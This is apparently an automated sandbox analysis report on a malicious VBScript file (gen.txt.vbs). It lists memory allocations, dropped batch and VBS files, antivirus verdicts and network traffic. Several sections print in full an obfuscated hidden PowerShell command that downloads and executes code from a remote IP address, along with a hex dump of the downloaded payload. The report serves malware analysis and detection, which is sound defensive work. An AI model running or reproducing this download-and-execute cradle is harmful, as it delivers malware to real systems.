NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 25, 2023, 9:27 a.m.	process_identifier: 2228 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\BTXQJSSA.bat
file	C:\Users\Public\BTXQJSSA.vbs

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 25, 2023, 9:27 a.m.	show_type: 0 filepath_r: Cmd.exe parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: Cmd.exe	1	1	0

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Kaspersky	HEUR:Trojan.Script.Generic
ZoneAlarm	HEUR:Trojan.Script.Generic
Ikarus	Trojan.PowerShell.Agent

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 25, 2023, 9:27 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received

7/00/00/00/28/0C/00/00/06/16/6A/3C/0B/00/00/00/16/28/13/00/00/06/DD/45/00/00/00/28/08/00/00/06/28/0A/00/00/06/28/0E/00/00/06/69/28/0C/00/00/06/69/14/FE/06/1F/00/00/06/73/3C/00/00/0A/14/6F/3D/00/00/0A/26/38/06/00/00/00/16/28/13/00/00/06/DD/0C/00/00/00/26/16/28/13/00/00/06/DD/00/00/00/00/2A/00/00/41/1C/00/00/00/00/00/00/00/00/00/00/AD/01/00/00/AD/01/00/00/0C/00/00/00/01/00/00/01/1B/30/04/00/04/01/00/00/05/00/00/11/28/14/00/00/06/0A/16/0B/06/12/01/28/49/00/00/0A/28/12/00/00/06/3A/05/00/00/00/DD/E4/00/00/00/02/8E/69/28/4A/00/00/0A/0C/28/06/00/00/06/15/17/6F/4B/00/00/0A/26/28/08/00/00/06/08/16/08/8E/69/6F/4C/00/00/0A/02/8E/69/20/40/42/0F/00/3E/6E/00/00/00/02/73/4D/00/00/0A/0D/16/13/04/09/16/6A/6F/4E/00/00/0A/20/50/C3/00/00/8D/44/00/00/01/13/05/38/26/00/00/00/28/06/00/00/06/15/17/6F/4B/00/00/0A/26/28/08/00/00/06/11/05/16/11/04/6F/4C/00/00/0A/28/08/00/00/06/6F/4F/00/00/0A/09/11/05/16/11/05/8E/69/6F/45/00/00/0A/25/13/04/16/30/C7/DD/33/00/00/00/09/39/06/00/00/00/09/6F/33/00/00/0A/DC/28/06/00/00/06/15/17/6F/4B/00/00/0A/26/28/08/00/00/06/02/16/02/8E/69/6F/4C/00/00/0A/28/08/00/00/06/6F/4F/00/00/0A/DD/19/00/00/00/26/16/28/13/00/00/06/DD/0D/00/00/00/07/39/06/00/00/00/06/28/50/00/00/0A/DC/2A/01/28/00/00/02/00/58/00/5A/B2/00/0D/00/00/00/00/00/00/10/00/DA/EA/00/0C/01/00/00/01/02/00/08/00/EE/F6/00/0D/00/00/00/00/1B/30/03/00/50/00/00/00/00/00/00/00/73/94/00/00/06/25/72/12/21/00/70/6F/7F/00/00/06/72/20/21/00/70/6F/8C/00/00/06/25/72/2A/21/00/70/6F/7F/00/00/06/28/35/00/00/06/6F/8C/00/00/06/6F/89/00/00/06/28/20/00/00/06/28/51/00/00/0A/17/28/1A/00/00/06/DD/06/00/00/00/26/DD/00/00/00/00/2A/01/10/00/00/00/00/00/00/49/49/00/06/01/00/00/01/1B/30/02/00/2C/00/00/00/00/00/00/00/28/19/00/00/06/39/16/00/00/00/28/12/00/00/06/39/0C/00/00/00/28/17/00/00/06/17/58/28/18/00/00/06/DD/06/00/00/00/26/DD/00/00/00/00/2A/01/10/00/00/00/00/00/00/25/25/00/06/01/00/00/01/1B/30/05/00/76/02/00/00/06/00/00/11/7E/05/00/00/04/28/52/00/00/0A/7E/06/00/00/04/28/53/00/00/0A/73/54/00/00/0A/0A/28/55/00/00/0A/6F/56/00/00/0A/6F/57/00/00/0A/0B/07/06/6F/58/00/00/0A/28/59/00/00/0A/39/2F/02/00/00/28/5A/00/00/0A/0C/16/0D/38/3B/00/00/00/08/09/A3/50/00/00/01/13/04/11/04/6F/56/00/00/0A/6F/57/00/00/0A/06/6F/58/00/00/0A/28/25/00/00/0A/39/07/00/00/00/11/04/6F/5B/00/00/0A/DD/06/00/00/00/26/DD/00/00/00/00/09/17/58/0D/09/08/8E/69/32/BF/28/30/00/00/06/39/71/00/00/00/73/5C/00/00/0A/13/05/11/05/72/3A/21/00/70/6F/5D/00/00/0A/11/05/1B/8D/38/00/00/01/25/16/72/42/21/00/70/A2/25/17/06/6F/5E/00/00/0A/28/5F/00/00/0A/A2/25/18/72/AC/21/00/70/A2/25/19/06/6F/58/00/00/0A/A2/25/1A/72/BE/21/00/70/A2/28/60/00/00/0A/6F/61/00/00/0A/11/05/17/6F/62/00/00/0A/11/05/17/6F/63/00/00/0A/11/05/28/64/00/00/0A/26/38/52/00/00/00/7E/65/00/00/0A/72/D2/21/00/70/28/66/00/00/0A/18/6F/67/00/00/0A/13/06/11/06/06/6F/5E/00/00/0A/28/5F/00/00/0A/72/30/22/00/70/06/6F/58/00/00/0A/72/30/22/00/70/28/68/00/00/0A/6F/69/00/00/0A/DD/0F/00/00/00/11/06/39/07/00/00/00/11/06/6F/33/00/00/0A/DC/06/6F/58/00/00/0A/28/6A/00/00/0A/39/15/00/00/00/06/6F/58/00/00/0A/28/6B/00/00/0A/20/E8/03/00/00/28/14/00/00/0A/06/6F/58/00/00/0A/17/73/6C/00/00/0A/07/28/6D/00/00/0A/13/07/11/07/16/11/07/8E/69/6F/4C/00/00/0A/28/31/00/00/06/28/6E/00/00/0A/72/34/22/00/70/28/6F/00/00/0A/13/08/11/08/73/70/00/00/0A/13/09/11/09/72/3E/22/00/70/6F/71/00/00/0A/11/09/72/52/22/00/70/6F/71/00/00/0A/11/09/72/72/22/00/70/06/6F/58/00/00/0A/72/30/22/00/70/28/68/00/00/0A/6F/71/00/00/0A/11/09/72/88/22/00/70/28/72/00/00/0A/28/6F/00/00/0A/6F/71/00/00/0A/11/09/72/90/22/00/70/11/08/28/73

Data received

/00/00/0A/72/9C/22/00/70/28/68/00/00/0A/6F/71/00/00/0A/DD/0F/00/00/00/11/09/39/07/00/00/00/11/09/6F/33/00/00/0A/DC/73/5C/00/00/0A/25/11/08/6F/5D/00/00/0A/25/17/6F/63/00/00/0A/25/16/6F/74/00/00/0A/25/16/6F/75/00/00/0A/25/17/6F/62/00/00/0A/28/64/00/00/0A/26/16/28/16/00/00/0A/DD/06/00/00/00/26/DD/00/00/00/00/2A/00/00/41/64/00/00/00/00/00/00/51/00/00/00/28/00/00/00/79/00/00/00/06/00/00/00/01/00/00/01/02/00/00/00/1B/01/00/00/2C/00/00/00/47/01/00/00/0F/00/00/00/00/00/00/00/02/00/00/00/BA/01/00/00/6C/00/00/00/26/02/00/00/0F/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/6F/02/00/00/6F/02/00/00/06/00/00/00/31/00/00/01/1B/30/02/00/3A/00/00/00/07/00/00/11/21/00/22/E2/33/0E/00/00/00/0A/28/77/00/00/0A/28/78/00/00/0A/73/79/00/00/0A/28/7A/00/00/0A/06/3D/07/00/00/00/17/0B/DD/0D/00/00/00/DD/06/00/00/00/26/DD/00/00/00/00/16/2A/07/2A/00/00/01/10/00/00/00/00/00/00/30/30/00/06/01/00/00/01/1B/30/02/00/34/00/00/00/02/00/00/11/73/7B/00/00/0A/28/7C/00/00/0A/6F/7D/00/00/0A/72/AC/22/00/70/6F/7E/00/00/0A/39/07/00/00/00/17/0A/DD/0D/00/00/00/DD/06/00/00/00/26/DD/00/00/00/00/16/2A/06/2A/01/10/00/00/00/00/00/00/2A/2A/00/06/01/00/00/01/1B/30/02/00/FA/00/00/00/08/00/00/11/72/B2/22/00/70/73/7F/00/00/0A/0A/06/6F/80/00/00/0A/0B/07/6F/81/00/00/0A/0C/38/8B/00/00/00/08/6F/82/00/00/0A/0D/09/72/F8/22/00/70/6F/83/00/00/0A/6F/38/00/00/0A/6F/7D/00/00/0A/13/04/11/04/72/12/23/00/70/28/25/00/00/0A/39/24/00/00/00/09/72/3E/23/00/70/6F/83/00/00/0A/6F/38/00/00/0A/6F/84/00/00/0A/72/4A/23/00/70/6F/7E/00/00/0A/3A/30/00/00/00/11/04/72/5A/23/00/70/6F/7E/00/00/0A/3A/1F/00/00/00/09/72/3E/23/00/70/6F/83/00/00/0A/6F/38/00/00/0A/72/68/23/00/70/28/25/00/00/0A/39/08/00/00/00/17/13/05/DD/4E/00/00/00/08/6F/85/00/00/0A/3A/6A/FF/FF/FF/DD/0D/00/00/00/08/39/06/00/00/00/08/6F/33/00/00/0A/DC/DD/0D/00/00/00/07/39/06/00/00/00/07/6F/33/00/00/0A/DC/DD/0D/00/00/00/06/39/06/00/00/00/06/6F/33/00/00/0A/DC/DD/06/00/00/00/26/DD/00/00/00/00/16/2A/11/05/2A/00/00/01/34/00/00/02/00/19/00/A0/B9/00/0D/00/00/00/00/02/00/12/00/B9/CB/00/0D/00/00/00/00/02/00/0B/00/D2/DD/00/0D/00/00/00/00/00/00/00/00/EF/EF/00/06/01/00/00/01/1B/30/02/00/25/00/00/00/09/00/00/11/16/0A/28/55/00/00/0A/6F/86/00/00/0A/12/00/28/3B/00/00/06/26/06/0B/DD/08/00/00/00/26/06/0B/DD/00/00/00/00/07/2A/00/00/00/01/10/00/00/00/00/02/00/19/1B/00/08/01/00/00/01/1B/30/01/00/2F/00/00/00/0A/00/00/11/72/7E/23/00/70/28/3A/00/00/06/0A/12/00/28/87/00/00/0A/39/07/00/00/00/17/0B/DD/0F/00/00/00/16/0B/DD/08/00/00/00/26/16/0B/DD/00/00/00/00/07/2A/00/01/10/00/00/00/00/00/00/25/25/00/08/01/00/00/01/1B/30/04/00/65/00/00/00/0B/00/00/11/1B/8D/01/00/00/01/25/16/28/88/00/00/0A/8C/66/00/00/01/A2/25/17/28/89/00/00/0A/A2/25/18/28/8A/00/00/0A/A2/25/19/28/8B/00/00/0A/A2/25/1A/28/77/00/00/0A/28/78/00/00/0A/73/79/00/00/0A/28/7A/00/00/0A/8C/68/00/00/01/A2/28/8C/00/00/0A/28/2E/00/00/06/0A/DD/0C/00/00/00/26/72/96/23/00/70/0A/DD/00/00/00/00/06/2A/00/00/00/01/10/00/00/00/00/00/00/57/57/00/0C/01/00/00/01/13/30/03/00/5D/00/00/00/0C/00/00/11/73/8D/00/00/0A/28/8E/00/00/0A/02/6F/1F/00/00/0A/0A/06/6F/8F/00/00/0A/0A/73/90/00/00/0A/0B/06/0C/16/0D/38/1C/00/00/00/08/09/91/13/04/07/12/04/72/A8/23/00/70/28/91/00/00/0A/6F/92/00/00/0A/26/09/17/58/0D/09/08/8E/69/32/DE/07/6F/38/00/00/0A/16/1F/14/6F/93/00/00/0A/6F/94/00/00/0A/2A/00/00/00/13/30/07/00/B0/01/00/00/0D/00/00/11/73/94/00/00/06/25/72/12/21/00/70/6F/7F/00/00/06/72/AE/23/00/70/6F/8C/00/00/06/25/72/C4/23/00/70/6F/7F/00/00/06/7E/10/00/00/04/6F/8C/00/00/06/25/72/CE/23/00/70/6F/7F/00/00/06/28/89/00/00/0A/6F/38/00/00/0A/6F/8C/00/00/06/25/72/D8/23/00/70/6F/7F/00/00/06/73/7B/00/00/0A/28/7C/00/00/0A/6F/38/00/00/0A/72/DE/23/00/70/14/6F/95/00/00/0A/72/F2/23/00/70/28/96/00/00/0A/0A/12/00/28/97/00/00/0A/72/F6/23/00/70/72/00/24/00/70/6F/95/00/00/0A/72/0C/24/00/70/72/18/24/00/70/6F/95/00/00/0A/28/68/00/00/0A/6F/8C/00/00/06/25/72/24/24/00/70/6F/7F/00/00/06/28/98/00/00/0A/6F/8C/00/00/06/25/72

Poweshell is sending data to a remote host (1 event)

Data sent

GET /new/coder.jpg HTTP/1.1 Host: 51.254.49.49:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 25, 2023, 9:27 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

51.254.49.49

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Aug. 25, 2023, 9:27 a.m.	buffer: GET /new/coder.jpg HTTP/1.1 Host: 51.254.49.49:222 Connection: Keep-Alive socket: 1420 sent: 79	1	79	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://51.254.49.49:222/new/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (12 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

gen.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All